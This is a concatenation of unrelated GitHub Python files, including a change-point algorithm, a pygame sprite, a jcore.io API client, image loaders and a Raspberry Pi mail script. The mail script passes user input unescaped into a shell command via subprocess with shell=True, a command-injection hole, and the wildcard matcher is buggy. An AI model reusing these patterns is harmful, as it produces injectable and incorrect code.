strictly above L^{opt}_{k-1, n-1}, beg included\n qf_opt = utl.get_QF(n, k - 1, a, b, t)\n differences = qfs[~keep] - qf_opt[None, :]\n bks = utl.compute_break_points(*(differences.T), beg)\n new_to_keep = (bks <= end) if end != float(\"inf\") else (bks != float(\"inf\"))\n keep[~keep] = new_to_keep\n\n return former_T_hat[keep]\n\n\ndef incr_length(tau_arr, new_n):\n \"\"\"\n Given tau_arr an array of CP vectors for sequences of length < new_n,\n update them for sequences of length new_n\n \"\"\"\n assert (tau_arr < new_n - 1).all()\n tau_arr[..., -1] = new_n - 1\n\n\ndef full_pruning(n, k, a, b, former_T_hat, T_opt, lst_z_opt):\n \"\"\"\n Compute the full \\bar{\\mathcal T}_{k, n} as describe above\n \"\"\"\n not_pruned = pruning_step(n, k, a, b, former_T_hat, T_opt, lst_z_opt)\n incr_length(not_pruned, n)\n assert utl.isCPvector(not_pruned, n, k)\n\n T_bar = np.concatenate((expand(T_opt, n), not_pruned), axis=0)\n assert utl.isCPvector(T_bar, n, k)\n\n return T_bar\n\n\ndef expand(matrix_cp_vectors, n):\n \"\"\"\n Given matrix_cp_vectors an array of CP vectors for sequences of length m < n,\n add the CP m-1 and update them for sequences of length n\n \"\"\"\n copy_matrix_cp_vectors = np.copy(matrix_cp_vectors)\n res = np.concatenate(\n (\n copy_matrix_cp_vectors,\n (n - 1) * np.ones(copy_matrix_cp_vectors.shape[0])[:, None],\n ),\n axis=1,\n )\n assert res.shape == (\n copy_matrix_cp_vectors.shape[0],\n copy_matrix_cp_vectors.shape[1] + 1,\n )\n return res\n\n\ndef paraDP(N, K, a, b, plot=False, verbose=False, pruning=False):\n \"\"\"\n Corresponds to [Algorithm 3, Article]\n \"\"\"\n # T_opt :\n # List of (N + 1) elements\n # Element 0 is unused\n # Each element : matrix of cp vectors with k cps\n T_opt = [np.array([[-1, n - 1]], dtype=np.int) for n in range(0, N + 1)]\n\n # Z_opt :\n # List of (N + 1) elements\n # Element 0 is unused\n # Each element: list of z breakpoints\n Z_opt = [[-float(\"inf\")]] * (N + 1)\n for k in range(1, K + 1):\n new_T_opt = [T_opt[0]] * (N + 1)\n new_Z_opt = [None] * (N + 1)\n\n # Case n > k\n for n in range(k + 1, N + 1):\n\n # Checks\n for m in range(k, n):\n assert 
utl.isCPvector(T_opt[m], m, k - 1)\n\n if verbose:\n print(f\"n={n}, k={k}\")\n\n if not (pruning and n > k + 1):\n new_T_hat = np.concatenate([expand(T_opt[m], n) for m in range(k, n)])\n if verbose:\n print(f\"T_hat={new_T_hat}\")\n\n else:\n T_bar = full_pruning(\n n,\n k,\n a,\n b,\n T_hat.astype(np.int),\n T_opt[n - 1].astype(np.int),\n Z_opt[n - 1],\n )\n if verbose:\n print(f\"T_bar={T_bar}\")\n new_T_hat = T_bar\n T_hat = np.unique(new_T_hat, axis=0)\n lst_z, lst_t = paraCP(\n n, k, a, b, T_hat.astype(np.int), plot=(k == K and n == N) and plot\n )\n new_T_opt[n] = np.array(lst_t)\n new_Z_opt[n] = lst_z\n\n T_opt = new_T_opt\n Z_opt = new_Z_opt\n return lst_z, T_opt[N]\n","repo_name":"tobyj2/time-series-class-project","sub_path":"paraDP.py","file_name":"paraDP.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29350240889","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plot\n\n## Ejercicio 5\n\ndef greyscale_histogram(img):\n counts, bins, bars = plot.hist(img.ravel(), bins=256)\n plot.show()\n\ndef main(argv):\n\tif (len(argv) < 1):\n\t\tprint(\"Error de parámetros.\")\n\t\tprint(\"Uso: ejercicio5.py img1\")\n\t\tprint(\"\")\n\t\treturn\n\n\timg1 = cv2.imread(argv[0])\n\tif (img1 is None):\n\t\tprint(\"Error al cargar la imagen\")\n\t\treturn\n\n\tgreyscale_histogram(img1)\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"SpicyCactuar/computer-vision","sub_path":"practica-1/ejercicio5.py","file_name":"ejercicio5.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34467495135","text":"import pygame\r\nfrom load_sliced_sprites import *\r\n\r\n##### Explosions #####\r\n\r\nclass Explosion(pygame.sprite.Sprite):\r\n\r\n \r\n\r\n def __init__(self, position):\r\n \r\n pygame.sprite.Sprite.__init__(self, self.groups)\r\n self.explosion_images = load_sliced_sprites(50, 50, os.path.join('Resources','Images','Animations','explosiontileset.png'))\r\n for image in self.explosion_images:\r\n image.set_colorkey(image.get_at((0, 0))) # issues here suppost to make transparent\r\n self.frame = 0 # starting image\r\n self.image = self.explosion_images[self.frame] # use frame to get correct image\r\n self.rect = self.image.get_rect()\r\n self.NEW_IMAGE = 3 # time between images\r\n self.new_image = self.NEW_IMAGE # so we can reset the timer\r\n self.rect.center = position # center = position that was recieved when we called this \r\n\r\n\r\n def update(self, player):\r\n self.new_image -= 1 # count down till next image is used\r\n if self.new_image <= 0: # when we need to change the image\r\n self.frame += 1 # switch to next image\r\n self.new_image = self.NEW_IMAGE # reset image timer\r\n \r\n if self.frame >= (len(self.explosion_images) - 1): # when we run out of images\r\n self.kill() # die you wasteful explosion\r\n self.image = self.explosion_images[self.frame] # pick the image based on what frame we are on\r\n","repo_name":"joshuakcockrell/color-tower-defense","sub_path":"explosion.py","file_name":"explosion.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"5047594768","text":"from gpiozero import LED\nfrom gpiozero import PWMLED\nfrom gpiozero import Button\nfrom time import 
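The greyscale_histogram helper above goes straight to a plot; when only the 256-bin counts are needed, numpy.histogram over the flattened image gives the same tally without drawing anything:

import numpy as np

def greyscale_counts(img):
    # img: uint8 greyscale array; returns one count per intensity 0..255
    counts, _ = np.histogram(img.ravel(), bins=256, range=(0, 256))
    return counts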
sleep\n\nled3 = LED(13)\nled2 = LED(19)\nled1 = LED(26)\nled4 = LED(6)\nled5 = LED(5)\nbutton4 = Button(21)\nbutton3 = Button(20)\nbutton2 = Button(16)\n\ndef allon():\n    led1.on()\n    led2.on()\n    led3.on()\n    led4.on()\n    led5.on()\n\ndef alloff():\n    led1.off()\n    led2.off()\n    led3.off()\n    led4.off()\n    led5.off()\n\n\ndef alarm():\n    # blink all LEDs eight times\n    for _ in range(8):\n        allon()\n        sleep(0.5)\n        alloff()\n        sleep(0.5)\n\nprint(\"Mail Sender\")\nallon()\nalarm()\nsleep(1)\nprint(\"SMTP\")\nprint(\"G-Mail Server\")\nalloff()\nsleep(1)\nprint(\"Connected\")\nprint(\"...\")\nsleep(1)\nled1.on()\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"Hello, My name is MailBot.\")\nsleep(1)\nprint(\"I can send emails for you.\")\nsleep(1)\nprint(\"Let me show you.\")\nsleep(1)\nsleep(1)\nname = input(\"What is your name?\")\nprint(\"Oooo, nice to meet you\", name, \"!\")\nsleep(1)\nled2.on()\nprint(\"So\", name, \" let's send an email.\")\nsleep(1)\nprint(\"Your email should have a title.\")\nsleep(1)\ntitle = input(\"Title:\")\nsleep(1)\nled3.on()\nprint(\"Ok, Now write something in the body of the email.\")\nsleep(1)\nbody = input(\"Body:\")\nprint(\"Thank you!\")\nsleep(1)\nled4.on()\nprint(\"I will put them together.\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"Done!\")\nsleep(1)\nprint(\"Your email looks like this now:\")\nprint(\"...............................\")\nprint(\"Title:\")\nprint(title)\nprint(\"Body:\")\nprint(body)\nprint(\"...............................\")\nprint(\"End\")\nsleep(1)\nprint(\"The email is almost ready now. 
The address is missing.\")\nsleep(1)\nprint(\"I'll put a random one...:))\")\nsleep(1)\naddress=input(\"Address please:\")\nprint(\"Ok, so now is ready.\")\nsleep(1)\nled5.on()\n\nprint(\"Your email looks like this now:\")\nprint(\"Address:\")\nprint(address)\nprint(\"...............................\")\nprint(\"Title:\")\nprint(title)\nprint(\"Body:\")\nprint(body)\nprint(\"...............................\")\nprint(\"End\")\nsleep(1)\n\nprint(\"In order for me to send the email, there is one more step.\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"...\")\nsleep(1)\nprint(\"We need to confirm the transaction.\")\nalarm()\nsleep(1)\nprint(\"We will use a button for this.\")\nprint(\"...\")\nprint(\"Now press the SECRET button for the...\")\nsleep(5)\nbutton3.wait_for_press()\nalarm()\nprint(\"MAGIC to work.\")\nalarm()\nsleep(1)\n\n\nimport subprocess\ne = 'echo '+str(body)+' | mail -s '+str(title)+' '+str(address)\nsubprocess.call(e,shell=True)\n\n\nprint(\"Done!\")\n\nalloff()\n","repo_name":"vely44/KISAS","sub_path":"Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5821174124","text":"def wildcard_match(pattern, string):\n string_idx = 0\n pattern_idx = 0\n while pattern_idx < len(pattern):\n p = pattern[pattern_idx]\n if p == '*':\n string_idx = pattern_idx\n original_idx = pattern_idx\n pattern_idx += 1\n p = pattern[pattern_idx]\n s = string[string_idx]\n while s == p:\n string_idx += 1\n s = string[string_idx]\n\n if string_idx - original_idx == 0:\n return False\n pattern_idx += 1\n elif p == '?':\n string_idx = pattern_idx\n pattern_idx += 1\n s = string[string_idx]\n p = pattern[pattern_idx]\n if s == p:\n string_idx += 1\n pattern_idx += 1\n else:\n if p != string[string_idx]:\n return False\n string_idx += 1\n pattern_idx += 1\n\n if pattern_idx == string_idx:\n return True\n\n return False\n\ndef main():\n pattern = \"*ab\"\n string = \"aaaab\"\n print(wildcard_match(pattern, string))\n\n pattern = \"?ab\"\n string = \"bb\"\n print(wildcard_match(pattern, string))\n\nimport unittest\n\nclass Test(unittest.TestCase):\n def test(self):\n self.assertEqual(wildcard_match(\"*ab\", \"aaaab\"), True)\n self.assertEqual(wildcard_match(\"?ab\", \"bb\"), False)\n self.assertEqual(wildcard_match(\"?ab\", \"b\"), True)\n self.assertEqual(wildcard_match(\"?ab\", \"ab\"), True)\n\nif __name__ == \"__main__\":\n main()","repo_name":"ssarangi/algorithms","sub_path":"program_creek/wildcard_matching.py","file_name":"wildcard_matching.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9421585876","text":"from __future__ import print_function\nimport json\nimport threading\nimport time\nimport traceback\nimport sys\n\nimport six\n\nfrom ._protocol import CONNECT, CONNECTED, FAILED, METHOD, RESULT, GET_HISTORICAL_DATA, \\\n GET_METADATA, SET_METADATA, GET_REAL_TIME_DATA, SET_REAL_TIME_DATA\nfrom .exceptions import JCoreAPIException, JCoreAPITimeoutException, JCoreAPIAuthException, \\\n JCoreAPIConnectionClosedException, JCoreAPIUnexpectedMessageException, \\\n JCoreAPIErrorResponseException, JCoreAPIInvalidMessageException\n\ndef _default_on_unexpected_exception(exc_info):\n print(*traceback.format_exception(*exc_info), file=sys.stderr)\n\n\ndef _wait(cv, timeout):\n startTime = time.time()\n cv.wait(timeout)\n if timeout and time.time() - startTime >= timeout:\n 
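The tests above encode somewhat nonstandard wildcard semantics (for instance "?ab" is expected to match "b"). Under the usual glob rules, where '?' matches exactly one character and '*' matches any run including the empty one, the classic dynamic-programming formulation below is a standard alternative rather than the author's algorithm:

def wildcard_match_dp(pattern, string):
    # dp[i][j] is True iff pattern[:i] matches string[:j]
    m, n = len(pattern), len(string)
    dp = [[False] * (n + 1) for _ in range(m + 1)]
    dp[0][0] = True
    for i in range(1, m + 1):
        if pattern[i - 1] == '*':
            dp[i][0] = dp[i - 1][0]  # '*' can match the empty string
        for j in range(1, n + 1):
            if pattern[i - 1] == '*':
                # '*' matches nothing (drop it) or one more character (extend it)
                dp[i][j] = dp[i - 1][j] or dp[i][j - 1]
            elif pattern[i - 1] == '?' or pattern[i - 1] == string[j - 1]:
                dp[i][j] = dp[i - 1][j - 1]
    return dp[m][n]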
raise JCoreAPITimeoutException('operation timed out')\n\n\ndef _from_protocol_error(error):\n if error:\n if isinstance(error, six.text_type):\n return error\n if isinstance(error, dict):\n return error[six.u('error')] if six.u('error') in error else error\n\ndef _get_list(type_, items, name=\"items\"):\n \"\"\"\n Normalizes maybe item or list of items to maybe list\n \"\"\"\n if isinstance(items, type_):\n return [items]\n if items:\n assert isinstance(items, list), name + \" must be a \" + type_ + \" or list if present\"\n for channelid in items:\n assert isinstance(channelid, type_), name + \" must all be of type \" + type_\n return items\n\ndef _get_channelids(channelids=None):\n return _get_list(six.string_types, channelids, name=\"channelids\")\n\nclass JCoreAPIConnection:\n \"\"\"\n A connection a to jcore.io server.\n\n sock: the socket to communicate with. It must have these methods\n send(message): sends a message\n recv(): receives a message\n close(): closes the socket\n auth_required: whether authentication is required.\n If so, methods will throw an error if the client is not authenticated.\n default is True\n \"\"\"\n def __init__(self, sock, auth_required=True, on_unexpected_exception=_default_on_unexpected_exception):\n self._lock = threading.RLock()\n self._sock = sock\n self._auth_required = auth_required\n self._on_unexpected_exception = on_unexpected_exception\n self._started = False\n self._closed = False\n self._authenticating = False\n self._authenticated = False\n self._autherror = None\n self._authcv = threading.Condition(self._lock)\n\n self._cur_method_id = 0\n self._method_calls = {}\n\n self._recv_thread = threading.Thread(\n target=self._run_recv_thread, name=\"jcore.io receiver\")\n self._recv_thread.daemon = True\n\n def _run_recv_thread(self):\n # skip locking in this method since it's only reading fields\n sock = self._sock\n\n if not sock:\n return\n\n while not self._closed:\n try:\n self._handle_message(sock.recv())\n except JCoreAPITimeoutException:\n continue\n except JCoreAPIConnectionClosedException as error:\n self.close(error, sock_is_closed=True)\n return\n except Exception as e:\n try:\n self._on_unexpected_exception(sys.exc_info())\n except Exception as e:\n traceback.print_exc()\n\n def authenticate(self, token):\n \"\"\"\n authenticate the client.\n\n token: the token field from the decoded base64 api token.\n \"\"\"\n assert isinstance(token, six.text_type) and len(\n token) > 0, \"token must be a non-empty unicode string\"\n\n self._lock.acquire()\n try:\n if self._authenticated:\n raise JCoreAPIAuthException(\"already authenticated\")\n if self._authenticating:\n raise JCoreAPIAuthException(\n \"authentication already in progress\")\n\n self._authenticating = True\n self._autherror = None\n\n self._send(CONNECT, {six.u('token'): token})\n\n while self._authenticating:\n _wait(self._authcv, self._sock.gettimeout())\n\n if self._autherror:\n raise self._autherror\n finally:\n self._authenticating = False\n self._lock.release()\n \n def _require_auth(self):\n self._lock.acquire()\n try:\n if self._closed:\n raise JCoreAPIConnectionClosedException(\n \"connection is already closed\")\n if self._authenticating:\n raise JCoreAPIAuthException(\n \"authentication has not finished yet\")\n if self._auth_required and not self._authenticated:\n raise JCoreAPIAuthException(\"not authenticated\")\n finally:\n self._lock.release()\n\n def close(self, error=JCoreAPIConnectionClosedException('connection closed'), sock_is_closed=False):\n \"\"\"\n Close 
this connection.\n\n error: the error to raise from all outstanding requests.\n sock_is_closed: if True, will not redundantly call close() on the socket.\n \"\"\"\n self._lock.acquire()\n try:\n if self._closed:\n return\n\n if self._authenticating:\n self._autherror = error\n self._authcv.notify_all()\n\n for method_call in six.itervalues(self._method_calls):\n method_call['error'] = error\n method_call['done'] = True\n method_call['cv'].notify()\n\n self._method_calls.clear()\n\n self._authenticating = False\n self._authenticated = False\n self._closed = True\n\n if not sock_is_closed:\n self._sock.close()\n self._sock = None\n\n finally:\n self._lock.release()\n\n def get_real_time_data(self, channelids=None):\n \"\"\"\n Gets real-time data from the server.\n\n channelids: a string or list of strings specifying the channel id(s) to get data for\n\n returns: a JSON Real-Time Data object \n (https://jcoreio.gitbooks.io/jcore-api-py/content/docs/api/schema/realTimeData.md)\n \"\"\"\n return self._call(GET_REAL_TIME_DATA, [{'channelIds': _get_channelids(channelids)}] if channelids else [])\n\n def set_real_time_data(self, data):\n \"\"\"\n Sets real-time data on the server.\n\n data: a dict mapping from channel id to value\n \"\"\"\n assert isinstance(data, dict), \"data must be a dict\"\n self._call(SET_REAL_TIME_DATA, [data])\n\n def get_metadata(self, channelids=None):\n \"\"\"\n Gets metadata from the server.\n\n channelids: a string or list of strings specifying the channel id(s) to get data for\n\n returns: a dict mapping from channel id to JSON Metadata object\n (https://jcoreio.gitbooks.io/jcore-api-py/content/docs/api/schema/metadata.md)\n \"\"\"\n return self._call(GET_METADATA, [{'channelIds': _get_channelids(channelids)}] if channelids else [])\n\n def set_metadata(self, metadata):\n \"\"\"\n Sets metadata on the server.\n\n metadata: a dict mapping from channel id to JSON Metadata object\n \"\"\"\n assert isinstance(metadata, dict), \"metadata must be a dict\"\n self._call(SET_METADATA, [metadata])\n\n def get_historical_data(self, channelids, begintime, endtime):\n \"\"\"\n Gets historical data from the server.\n\n channelids: a string or list of strings specifying the channel id(s) to get data for\n begintime: the beginning of the time range to fetch; either an ISO Date\n string or a numeric timestamp (milliseconds since the epoch)\n endtime: the end of the time range to fetch; either an ISO Date\n string or a numeric timestamp (milliseconds since the epoch)\n\n returns: a JSON Historical Data object\n (https://jcoreio.gitbooks.io/jcore-api-py/content/docs/api/schema/historicalData.md)\n \"\"\"\n channelids = _get_channelids(channelids)\n assert isinstance(begintime, int) or isinstance(begintime, six.string_types), \\\n \"begintime must be a string or number\"\n assert isinstance(endtime, int) or isinstance(endtime, six.string_types), \\\n \"endtime must be a string or number\"\n return self._call(GET_HISTORICAL_DATA, [{'channelIds': channelids, 'beginTime': begintime, 'endTime': endtime}])\n\n def _call(self, method, params):\n assert isinstance(method, str) and len(\n method) > 0, \"method must be a non-empty str\"\n\n method_call = None\n _id = None\n\n self._lock.acquire()\n try:\n self._require_auth()\n _id = str(self._cur_method_id)\n self._cur_method_id += 1\n method_call = {\n 'done': False,\n 'error': None,\n 'result': None,\n 'cv': threading.Condition(self._lock) \n }\n self._method_calls[_id] = method_call\n\n self._send(METHOD, {\n 'id': _id,\n 'method': method,\n 
'params': params\n })\n\n while not method_call['done']:\n _wait(method_call['cv'], self._sock.gettimeout())\n\n if method_call['error']:\n raise method_call['error']\n return method_call['result']\n finally:\n if _id in self._method_calls:\n del self._method_calls[_id]\n self._lock.release()\n\n def _send(self, message_name, message):\n sock = None\n\n self._lock.acquire()\n try:\n if not self._started:\n self._started = True\n self._recv_thread.start()\n\n sock = self._sock\n if not sock or self._closed:\n raise JCoreAPIConnectionClosedException(\"connection closed\")\n finally:\n self._lock.release()\n\n message['msg'] = message_name\n sock.send(json.dumps(message))\n\n def _handle_message(self, event):\n message = json.loads(event)\n if six.u('msg') not in message:\n raise JCoreAPIInvalidMessageException(\n \"msg field is missing\", message)\n\n msg = message[six.u('msg')]\n if not (isinstance(msg, six.text_type) and len(msg) > 0):\n raise JCoreAPIInvalidMessageException(\n \"msg must be a non-empty unicode string\", message)\n\n # Synchronize all message handling to ensure we'll ignore messages\n # after the connection has closed\n self._lock.acquire()\n try:\n if self._closed:\n # don't raise an exception here, it has already been\n # handled in _run_recv_thread\n return\n\n if msg == CONNECTED:\n self._handle_connected_message(message)\n elif msg == FAILED:\n self._handle_failed_message(message)\n elif msg == RESULT:\n self._handle_result_message(message)\n else:\n self._handle_unknown_message(message) \n finally:\n self._lock.release()\n\n def _handle_connected_message(self, message):\n self._lock.acquire()\n try:\n if not self._authenticating:\n raise JCoreAPIUnexpectedMessageException(\n \"unexpected connected message\", message)\n self._authenticating = False\n self._authenticated = True\n self._authcv.notify_all()\n finally:\n self._lock.release()\n\n def _handle_failed_message(self, message):\n self._lock.acquire()\n try:\n if not self._authenticating:\n raise JCoreAPIUnexpectedMessageException(\n \"unexpected auth failed message\", message)\n error_msg = \"authentication failed\" if self._authenticating else \"unexpected auth failed message\"\n protocol_error = _from_protocol_error(\n message[six.u('error')]) if six.u('error') in message else None\n self._authenticating = False\n self._authenticated = False\n self._autherror = JCoreAPIAuthException(\n error_msg + (\": \" + protocol_error if protocol_error else \"\"), message)\n self._authcv.notify_all()\n finally:\n self._lock.release()\n\n def _handle_result_message(self, message):\n self._lock.acquire()\n try:\n msg = message[six.u('msg')]\n\n _id = message[six.u('id')]\n if not (isinstance(_id, six.text_type) and len(_id) > 0):\n raise JCoreAPIInvalidMessageException(\n \"id must be a non-empty unicode string\", message)\n\n if _id not in self._method_calls:\n raise JCoreAPIUnexpectedMessageException(\n \"method call not found: \" + _id, message)\n\n method_call = self._method_calls[_id]\n\n if six.u('error') in message:\n error = message[six.u('error')]\n if isinstance(error, JCoreAPIException):\n method_call['error'] = error\n else:\n method_call['error'] = JCoreAPIErrorResponseException(\n _from_protocol_error(error), message)\n elif six.u('result') in message:\n method_call['result'] = message[six.u('result')]\n method_call['done'] = True\n method_call['cv'].notify()\n finally:\n self._lock.release()\n\n def _handle_unknown_message(self, message):\n msg = message[six.u('msg')]\n if six.u('id') not in message:\n if msg 
!= RESULT:\n raise JCoreAPIInvalidMessageException(\n 'invalid message type: ' + msg, message)\n else:\n raise JCoreAPIInvalidMessageException(\n \"id field is missing\", message)\n\n if six.u('error') not in message:\n message[six.u('error')] = JCoreAPIInvalidMessageException(\n 'invalid message type: ' + msg, message)\n\n # handle it like a result message so that error gets raised on the\n # caller for its id\n return self._handle_result_message(message)\n","repo_name":"jcoreio/jcore-api-py","sub_path":"jcore_api/_connection.py","file_name":"_connection.py","file_ext":"py","file_size_in_byte":14561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39264365009","text":"for _ in range(int(input())):\r\n s = input()\r\n coin = {\r\n \"TTT\": 0,\r\n \"TTH\": 0,\r\n \"THT\": 0,\r\n \"THH\": 0,\r\n \"HTT\": 0,\r\n \"HTH\": 0,\r\n \"HHT\": 0,\r\n \"HHH\": 0,\r\n }\r\n for x in range(38):\r\n coin[s[x : x + 3]] += 1\r\n print(*coin.values())","repo_name":"sotthang/coding_study","sub_path":"백준/Bronze/2684. 동전 게임/동전 게임.py","file_name":"동전 게임.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10113800717","text":"import shutil\nimport os\n\ndef clean_description(lines):\n \n skip_prefixes = [\"Chandra Release -\", \"Visual Description:\"]\n return [line for line in lines if not any(line.startswith(prefix) for prefix in skip_prefixes) and line.strip() != '']\n\n# Duplicate the pairs folder\nsrc_folder = 'pairs'\ndst_folder = 'full_pairs'\n\nif os.path.exists(dst_folder):\n shutil.rmtree(dst_folder) # remove it if it already exists\nshutil.copytree(src_folder, dst_folder)\n\n# modify description_text files\nfor i in range(len(os.listdir(dst_folder))):\n pair_folder = f'{dst_folder}/pair_{i}'\n desc_file_path = f'{pair_folder}/description.txt' #our naming is consistent\n\n # does the description file exist?\n if os.path.exists(desc_file_path):\n with open(desc_file_path, 'r', encoding='utf-8', errors='replace') as desc_file:\n lines = desc_file.readlines()\n\n cleaned_lines = clean_description(lines)\n\n with open(desc_file_path, 'w', encoding='utf-8') as desc_file:\n desc_file.writelines(cleaned_lines)\n print(f'Modified: {desc_file_path}')\n\n# read into a list\nwith open('bad_texts.txt', 'r') as file:\n bad_texts = file.readlines()\n\n# add a bad txt file\nfor i, bad_text in enumerate(bad_texts):\n pair_folder = f'{dst_folder}/pair_{i}'\n \n # just to be safe\n if os.path.exists(pair_folder):\n with open(f'{pair_folder}/b_description.txt', 'w') as bad_text_file:\n bad_text_file.write(bad_text)\n print(f'Bad text {i} written: {pair_folder}/b_description.txt')\n","repo_name":"areshva/alttext","sub_path":"bad.py","file_name":"bad.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74969619607","text":"import numpy as np\nimport os\nfrom tqdm import tqdm\nimport cv2\nimport random\nfrom sklearn.utils import shuffle\nfrom sklearn.preprocessing import OneHotEncoder\nimport pandas as pd\n\n### Reading data functions\ndef imread(category, image, imagePath, shape, includeSides):\n path = os.path.join(imagePath,image) # create path to dogs and cats\n image = cv2.imread(path, cv2.IMREAD_GRAYSCALE);\n if (includeSides == 0):\n image = image[0:400,0:400];\n image = cv2.resize(image, shape);\n image = np.asarray(image);\n return [image, 
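The coin-game loop above tallies overlapping three-character windows into a pre-seeded dict (38 windows over a 40-toss string). The same count generalises to any window width with collections.Counter:

from collections import Counter

def count_windows(s, width=3):
    # overlapping windows: len(s) - width + 1 of them
    return Counter(s[i:i + width] for i in range(len(s) - width + 1))

The pre-seeded dict does keep a fixed key order for the final print, so the Counter version would need the eight head/tail triples listed explicitly to reproduce that output.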
category];\n\ndef createData(path, size, label, limit, includeSides):\n print(path)\n print(\"loading \" + label + \" data\")\n\n data = [];\n count = 0;\n filecount = 0;\n\n for imageFile in tqdm(os.listdir(path)):\n if filecount > limit:\n break\n\n # Label depending on the name of the image\n if (imageFile.find(\"HV\") != -1):\n data.append(imread('H', imageFile, path, size, includeSides));\n filecount += 1;\n elif (imageFile.find(\"PA\") != -1) or (imageFile.find(\"PT\") != -1):\n data.append(imread('P', imageFile, path, size, includeSides));\n filecount += 1;\n else:\n print(\"\");\n print(\"Unidintified file: \" + imageFile);\n print(\"\");\n\n # Randomize data for later input into neural net\n data = shuffle(data, random_state = 0);\n return np.asarray(data);\n\ndef preprocessImages(images):\n # Remove mean from set of images\n avgImg = findAverageImg(images);\n images = removeAverage(images, avgImg);\n # normalize variance from 0~255 to 0~1\n images = images.astype('float32') / 255;\n avgImg = avgImg.astype('float32') / 255;\n\n return images, avgImg;\n\n# Loads and reshapes into useful training data from filepath\n# filePath: specifies the folders with the images\n# imageSideLength: all images are squares, this specifies the side length of the square\n# imageNumberLimit: max images the function will load\n# All images projections of 3D volume scans are a 400*400px\n# front projection with 400*200 side projections one function loads with With\n# one loads without\n#TODO; this is fucking garbage code\ndef loadTrainingData(filePath, imageSideLength, imageNumberLimit):\n ### Creating data\n trainingData = createData(filePath, (imageSideLength, imageSideLength), \"training\", imageNumberLimit, 0);\n images = [];\n classifications = [];\n\n for data, categories in trainingData:\n images.append(data);\n classifications.append(categories);\n\n images = np.asarray(images);\n classifications = np.asarray(classifications);\n\n # Add dimention in X data so that keras can read it correctly\n images = images[..., np.newaxis];\n\n # Preprocess images\n images, average = preprocessImages(images);\n\n classifications = pd.DataFrame(classifications, columns = [\"Type\"]);\n\n encoder = OneHotEncoder(sparse = False);\n classifications = encoder.fit_transform(classifications);\n\n return [images, average, classifications];\n\ndef loadTrainingDataWithSides(filePath, imageSideLength, imageNumberLimit):\n ### Creating data\n trainingData = createData(filePath, (imageSideLength, imageSideLength), \"training\", imageNumberLimit, 1);\n\n images = [];\n classifications = [];\n\n for data, categories in trainingData:\n images.append(data);\n classifications.append(categories);\n\n images = np.asarray(images);\n classifications = np.asarray(classifications);\n\n classifications = pd.DataFrame(classifications, columns = [\"Type\"]);\n\n encoder = OneHotEncoder(sparse = False);\n classifications = encoder.fit_transform(classifications);\n\n # Add dimention in X data so that keras can read it correctly\n images = images[..., np.newaxis];\n\n # Preprocess images\n images, average = preprocessImages(images);\n\n return [images, average, classifications];\n\n############ Normalizing data ################################\n# Calculate the average image in the dataset\ndef findAverageImg(data):\n sumImg = np.zeros(data[0].shape, dtype = np.double);\n numOfImages = data.shape[0]\n for i in range(0, numOfImages):\n sumImg = sumImg + data[i];\n\n sumImg = sumImg/numOfImages\n return sumImg;\n\n# If given an average 
image, remove it from each image\ndef removeAverage(data, average):\n newData = np.copy(data);\n newData = newData.astype(np.double);\n numOfImages = data.shape[0]\n for i in range(0, numOfImages):\n newData[i] = newData[i] - average.astype(int);\n newData[i][newData[i] < 0] = 0;\n return newData;\n\n# If given an average image, add it to each image\ndef restoreAverage(data, average):\n newData = np.copy(data);\n newData = newData.astype(np.double);\n numOfImages = data.shape[0]\n for i in range(0, numOfImages):\n newData[i] = newData[i] + average.astype(int);\n newData[i][newData[i] > 255] = 255;\n return newData;\n\n'''\n# for testing this bit of code\nimport matplotlib.pyplot as plt\nfilePath = \"/home/alex/Documents/dataset/mipDataBest\"\ndata = loadTrainingData(filePath, 50, 100);\nimages, labels = data;\navg = findAverageImg(images);\nplt.imshow(np.reshape(images[0], (50,50)))\nplt.show();\nmeanLess = removeAverage(images, avg);\nplt.imshow(np.reshape(meanLess[0], (50,50)))\nplt.show();\nwithMean = restoreAverage(images, avg);\nplt.imshow(np.reshape(withMean[0], (50,50)))\nplt.show();\n'''\n","repo_name":"alexMilmore/BruteForceNeuralNet","sub_path":"importData.py","file_name":"importData.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28235539942","text":"import copy, random\nfrom ParleyV2.Utils.RhythmUtils import *\nfrom ParleyV2.Utils.TimingUtils import *\nfrom ParleyV2.Utils.VolumeUtils import *\n\n@dataclass\nclass MelodyPattern:\n intervals: [] = None\n timing_fractions: [] = None\n rests: [] = None\n\n\nclass PatternNoteSequenceGenerator:\n\n def __init__(self, gen_spec):\n self.gen_spec = gen_spec\n\n def apply(self, start_composition):\n composition = copy.deepcopy(start_composition)\n bar_start_volume = None\n patterns_hash = {}\n patterns = []\n for letter in self.gen_spec.get_value(\"pattern_form\"):\n if letter in patterns_hash:\n patterns.append(patterns_hash[letter])\n else:\n patterns.append(self.get_pattern())\n previous_spec = None\n num_patterns = len(patterns)\n for bar in composition.bars:\n pattern = patterns[bar.bar_num % 